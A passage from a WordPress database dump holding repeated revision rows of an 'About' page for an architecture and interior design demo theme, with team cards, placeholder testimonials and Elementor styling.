rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:18:06','2023-05-25 10:18:06','',38,'https://bauhaus.futuremediatrix.com/?p=4754',0,'revision','',0),(4755,2,'2023-05-25 10:18:40','2023-05-25 10:18:40','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:18:40','2023-05-25 10:18:40','',38,'https://bauhaus.futuremediatrix.com/?p=4755',0,'revision','',0),(4756,2,'2023-05-25 10:18:40','2023-05-25 10:18:40','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or call: 						\n					<ul>\n								<li>\n																					<a href=\"tel:1800111543 \">\n													+ 1800-111-543 												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-05-25 10:18:40','2023-05-25 10:18:40','',38,'https://bauhaus.futuremediatrix.com/?p=4756',0,'revision','',0),(4757,2,'2023-05-25 10:18:40','2023-05-25 10:18:40','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								REDESIGN LIFE							</h2>\n		<p>We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit ‘’redesign life’’ is about giving major change to people’’s life and makes their home as inspiring place.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"74\" height=\"74\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/avatar.jpg\" alt=\"\" loading=\"lazy\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading 